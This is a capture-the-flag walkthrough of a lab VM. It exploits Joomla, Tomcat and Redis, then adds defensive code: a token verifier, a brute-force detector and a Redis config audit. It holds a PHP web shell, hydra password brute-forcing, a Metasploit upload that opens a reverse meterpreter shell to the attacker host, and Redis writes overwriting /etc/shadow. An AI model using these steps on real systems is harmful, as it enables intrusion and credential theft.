1) jenkins
2) joomla
3) bruteforce (ftp,tomcat)
4) tomcat
5) redis
nmap -p- -T4 -sS -O 10.0.1.3
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-17 11:34 CET
Nmap scan report for 10.0.1.3
Host is up (0.0012s latency).
Not shown: 65517 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1322/tcp open novation
2049/tcp open nfs
6379/tcp open unknown
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
32938/tcp open unknown
41511/tcp open unknown
42149/tcp open unknown
46990/tcp open unknown
48201/tcp open unknown
52526/tcp open unknown
59559/tcp open unknown
MAC Address: 08:00:27:F8:A1:F5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds
1) Joomla
http://10.0.1.3:8081/
http://10.0.1.3:8081/index2.php <= <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> (index2.php was discovered with dirbuster)
I used the exploit "(Token) Remote Admin Change Password Vulnerability":
https://www.exploit-db.com/exploits/6234/
10.0.1.3:8081/index.php?option=com_user&view=reset&layout=confirm
1) Enter the character ' into the "token" field and click OK.
2) Set a new password for admin.
3) Go to 10.0.1.3:8081/administrator
4) Log in as admin:new_pass
I now have access to the admin panel - http://10.0.1.3:8081/administrator/index.php
Next I installed a new extension, directphp, because I wanted to add my PHP code to an article:
<?php system($_GET['i']); ?>
http://10.0.1.3:8081/?i=cat%20configuration.php
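The reset flow above falls over because the token check accepts an input that is not a token at all. The following is an added example, not Joomla's code: it assumes (as an illustration of the bug class, not a claim about Joomla 1.5's exact source) that a permissive input filter reduces a lone quote to the empty string, which then matches every account whose pending-token column is empty. The account table, the `activation` column and the helper names are constructed for the example. The hardened verifier shows the checks a reset endpoint needs: a strict token format rejected before any lookup, no match on an empty stored value, a constant-time comparison, an expiry, and single use.

```python
import hmac
import re
import secrets
import time

# Constructed sample account table (not Joomla's schema): "activation" holds the
# pending reset token, and is empty for accounts with no reset in progress.
USERS = {
    "admin": {"activation": "", "blocked": False, "issued": 0.0},
    "editor": {"activation": "", "blocked": False, "issued": 0.0},
}

TOKEN_RE = re.compile(r"^[0-9a-f]{32}$")  # exact shape of the tokens we issue


def sanitize_alnum(raw):
    """Strip everything that is not a letter or digit (models a permissive input filter)."""
    return re.sub(r"[^0-9A-Za-z]", "", raw)


def lookup_weak(raw_token):
    """Weak verifier: sanitize first, then match whatever is left against the
    activation column.  Input made only of stripped characters, such as a lone
    quote, becomes "" and matches every unblocked account with no pending reset."""
    token = sanitize_alnum(raw_token)
    return [name for name, u in USERS.items()
            if not u["blocked"] and u["activation"] == token]


def issue_token(name, now=None):
    """Create a fresh single-use reset token for an account and record when."""
    token = secrets.token_hex(16)
    USERS[name]["activation"] = token
    USERS[name]["issued"] = time.time() if now is None else now
    return token


def lookup_hardened(raw_token, now=None, max_age=3600):
    """Hardened verifier: reject anything that is not a well-formed token before
    touching the table, never match an empty stored value, compare in constant
    time, enforce an expiry, and consume the token on success."""
    if not TOKEN_RE.fullmatch(raw_token):
        return None
    now = time.time() if now is None else now
    for name, u in USERS.items():
        stored = u["activation"]
        if u["blocked"] or not stored:
            continue
        if hmac.compare_digest(stored, raw_token) and now - u["issued"] <= max_age:
            u["activation"] = ""          # single use: the token is consumed
            return name
    return None
```

`lookup_weak("'")` returns both accounts, which is exactly the "any token resets admin" behaviour used above; `lookup_hardened("'")` returns nothing, and a real token works once and only before it expires.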
2) Cracking the Tomcat manager password
hydra -l tomcat -P /usr/share/wordlists/rockyou.txt -e ns -s 8080 -vV 10.0.1.3 http-get /manager/html
[8080][http-get] host: 10.0.1.3 login: tomcat password: tomcat
Next I used Metasploit:
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.0.1.3 yes The target address
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.1.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
msf exploit(tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 10.0.1.2:4444
[*] 10.0.1.3:8080 - Retrieving session ID and CSRF token...
[*] 10.0.1.3:8080 - Uploading and deploying ltKnITWSrBQ5ioDn...
[*] 10.0.1.3:8080 - Executing ltKnITWSrBQ5ioDn...
[*] 10.0.1.3:8080 - Undeploying ltKnITWSrBQ5ioDn ...
[*] Sending stage (46089 bytes) to 10.0.1.3
[*] Meterpreter session 2 opened (10.0.1.2:4444 -> 10.0.1.3:39544) at 2016-03-16 10:46:20 +0100
meterpreter >
meterpreter > shell
Process 1 created.
Channel 1 created.
ls
common
conf
logs
server
shared
webapps
work
uname -a
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
3) Cracking the FTP password
hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -e s -s 25 10.0.1.3 ftp
[25][ftp] host: 10.0.1.3 login: admin password: admin
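Both hydra runs above (section 2 against the Tomcat manager, section 3 against FTP) leave the same trace on the target: a burst of failed logins from one source, followed by a success once the wordlist hits. This added detector is not part of the writeup; it assumes a Tomcat access log in the default "common" pattern and a vsftpd-style log, and the sample lines, threshold and window are constructed for the example. It keeps a sliding window of failures per source and service, alerts once when a source crosses the threshold, and raises a second, higher-value alert if that source then logs in successfully.

```python
import re
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta, timezone

Event = namedtuple("Event", "service ip ts success")

# Tomcat access log in the default "common" pattern, e.g.
#   10.0.1.2 - - [16/Mar/2016:10:40:01 +0100] "GET /manager/html HTTP/1.1" 401 2473
TOMCAT_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
# vsftpd.log, e.g.
#   Thu Mar 17 11:40:00 2016 [pid 1234] [admin] FAIL LOGIN: Client "10.0.1.2"
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[[^\]]*\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')


def parse_event(line):
    """Return an Event for a manager-app or FTP login attempt, or None for other lines."""
    m = TOMCAT_RE.match(line)
    if m:
        if not m["path"].startswith("/manager") or m["status"] not in ("200", "401"):
            return None
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        return Event("tomcat-manager", m["ip"], ts, m["status"] == "200")
    m = VSFTPD_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)
        return Event("ftp", m["ip"], ts, m["result"] == "OK")
    return None


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Sliding-window count of failures per (service, ip).  Emits one "bruteforce"
    alert when a source crosses the threshold, and a "success-after-burst" alert
    if the same source then logs in: the moment the wordlist found the password."""
    recent = defaultdict(deque)
    fired = set()
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        key = (ev.service, ev.ip)
        if ev.success:
            if key in fired:
                alerts.append(("success-after-burst",) + key + (ev.ts,))
            continue
        q = recent[key]
        q.append(ev.ts)
        while ev.ts - q[0] > window:       # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in fired:
            fired.add(key)
            alerts.append(("bruteforce",) + key + (ev.ts,))
    return alerts


# Constructed sample log lines: 12 manager failures then a success from one host,
# a single failure from another, and three FTP failures (below the default threshold).
SAMPLE_LOG = [
    f'10.0.1.2 - - [16/Mar/2016:10:40:{i:02d} +0100] "GET /manager/html HTTP/1.1" 401 2473'
    for i in range(12)
] + [
    '10.0.1.2 - - [16/Mar/2016:10:40:12 +0100] "GET /manager/html HTTP/1.1" 200 15143',
    '10.0.1.9 - - [16/Mar/2016:10:41:00 +0100] "GET /manager/html HTTP/1.1" 401 2473',
] + [
    f'Thu Mar 17 11:40:{i:02d} 2016 [pid 1234] [admin] FAIL LOGIN: Client "10.0.1.2"'
    for i in range(3)
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(*alert)
```

On the sample the default threshold flags the Tomcat source twice (burst, then success) and ignores the three FTP failures; lowering the threshold to 3 flags the FTP source as well. The "success-after-burst" alert is the one worth paging on: it is the signal that the credential should be rotated and the manager session reviewed.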
4) Redis
root@kali:~# redis-cli -h 10.0.1.3
10.0.1.3:6379> INFO
# Server
redis_version:3.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:aa70bcb321ba8313
redis_mode:standalone
os:Linux 3.19.0-25-generic i686
arch_bits:32
multiplexing_api:epoll
gcc_version:4.8.4
process_id:1215
run_id:f77a1654a20f1a67cadbe83761f0bd907ce01e0e
tcp_port:6379
uptime_in_seconds:4070
uptime_in_days:0
hz:10
lru_clock:15370196
config_file:/etc/redis/6379.conf
# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:659136
used_memory_human:643.69K
used_memory_rss:9306112
used_memory_peak:687064
used_memory_peak_human:670.96K
used_memory_lua:24576
mem_fragmentation_ratio:14.12
mem_allocator:jemalloc-3.6.0
# Persistence
loading:0
rdb_changes_since_last_save:1
rdb_bgsave_in_progress:0
rdb_last_save_time:1458210485
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:21
total_commands_processed:74
instantaneous_ops_per_sec:0
total_net_input_bytes:6574
total_net_output_bytes:22122
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:14331
migrate_cached_sockets:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:34.07
used_cpu_user:0.28
used_cpu_sys_children:0.02
used_cpu_user_children:0.00
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=2,expires=0,avg_ttl=0
10.0.1.3:6379>
Prepare the public key with blank lines on both sides so it stays on a line of its own inside the binary RDB dump that Redis will write:
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/foo.txt
Module options (auxiliary/scanner/redis/file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
DISABLE_RDBCOMPRESSION true yes Disable compression when saving if found to be enabled
LocalFile no Local file to be uploaded
Password foobared no Redis password for authentication test
RHOSTS yes The target address range or CIDR identifier
RPORT 6379 yes The target port
RemoteFile no Remote file path
THREADS 1 yes The number of concurrent threads
msf auxiliary(file_upload) > set RHOSTS 10.0.1.3
RHOSTS => 10.0.1.3
msf auxiliary(file_upload) > exploit
[-] Auxiliary failed: RuntimeError bad-config: LocalFile must be set
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/redis/file_upload.rb:150:in `run_host'
[-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:121:in `block (2 levels) in run'
[-] /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set LocalFile /root/.ssh/foo.txt
LocalFile => /root/.ssh/foo.txt
msf auxiliary(file_upload) > set RemoteFile /root/.ssh/authorized_keys
RemoteFile => /root/.ssh/authorized_keys
msf auxiliary(file_upload) > exploit
[-] 10.0.1.3:6379 - 10.0.1.3:6379 -- failed to save 392 bytes to /root/.ssh/authorized_keys (permissions?)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set RemoteFile /root/.ssh/id_rsa
RemoteFile => /root/.ssh/id_rsa
msf auxiliary(file_upload) > exploit
[+] 10.0.1.3:6379 - 10.0.1.3:6379 -- saved 392 bytes inside of redis DB at /root/.ssh/id_rsa
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set RemoteFile /etc/shadow
RemoteFile => /etc/shadow
msf auxiliary(file_upload) > exploit
[+] 10.0.1.3:6379 - 10.0.1.3:6379 -- saved 392 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set LocalFile /etc/shadow
LocalFile => /etc/shadow
msf auxiliary(file_upload) > set RemoteFile /etc/shadow
RemoteFile => /etc/shadow
msf auxiliary(file_upload) > exploit
[+] 10.0.1.3:6379 - 10.0.1.3:6379 -- saved 1664 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) >
DONE
I logged in to the VM as root.
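Everything in section 4 rests on three settings: the server accepted connections from the network, it asked for no password, and CONFIG SET was available to choose where SAVE writes its dump. The successful writes to /root/.ssh/id_rsa and /etc/shadow also show the daemon ran with root privileges. The following audit script is an added example, not something from the writeup or from the Redis project; the two config samples are constructed (the instance's own /etc/redis/6379.conf, named in the INFO output, is not shown), and the finding codes are my own. Note that protected-mode was introduced in Redis 3.2, so the 3.0.7 instance above had only bind and requirepass to rely on.

```python
import ipaddress
import shlex

# Constructed samples (not the writeup's /etc/redis/6379.conf, which is not shown).
WEAK_CONF = """
# effectively the defaults of a pre-3.2 redis.conf: no bind, no password
port 6379
daemonize yes
dir /var/lib/redis
"""

HARDENED_CONF = """
port 6379
bind 127.0.0.1 ::1
protected-mode yes
requirepass "a-long-random-secret-of-at-least-32-characters"
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Turn redis.conf text into (directive, args) pairs; comments and blanks are dropped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def _is_loopback(addr):
    """True for 127.0.0.0/8 and ::1; hostnames are treated as not loopback."""
    try:
        return ipaddress.ip_address(addr.lstrip("-")).is_loopback
    except ValueError:
        return False


def audit_redis_conf(text):
    """Return (code, message) findings for the settings that let an anonymous
    client turn SAVE into an arbitrary file write, as in the session above."""
    directives, renamed = {}, {}
    for name, args in parse_redis_conf(text):
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            directives[name] = args
    findings = []
    bind = directives.get("bind")
    if not bind:
        findings.append(("bind-all", "no bind directive: Redis listens on every interface"))
    elif not all(_is_loopback(a) for a in bind):
        findings.append(("bind-exposed", "bind includes a non-loopback address: " + " ".join(bind)))
    pw = directives.get("requirepass")
    if not pw or not pw[0]:
        findings.append(("no-auth", "no requirepass: every client that can connect is fully trusted"))
    elif len(pw[0]) < 32:
        findings.append(("weak-auth", "requirepass is short; AUTH is not throttled, so guessing is cheap"))
    pm = directives.get("protected-mode")
    if pm and pm[0].lower() == "no":
        findings.append(("protected-mode-off", "protected-mode explicitly disabled (Redis 3.2+)"))
    if "CONFIG" not in renamed:
        findings.append(("config-exposed",
                         "CONFIG reachable by its default name: CONFIG SET dir/dbfilename chooses where SAVE writes"))
    return findings


if __name__ == "__main__":
    for code, msg in audit_redis_conf(WEAK_CONF):
        print(f"[{code}] {msg}")
```

The weak sample produces three findings (bind-all, no-auth, config-exposed) and the hardened one none. Running the daemon as a dedicated unprivileged user is the remaining control the config file cannot express: even with CONFIG reachable, a non-root Redis cannot write into /root/.ssh or /etc/shadow.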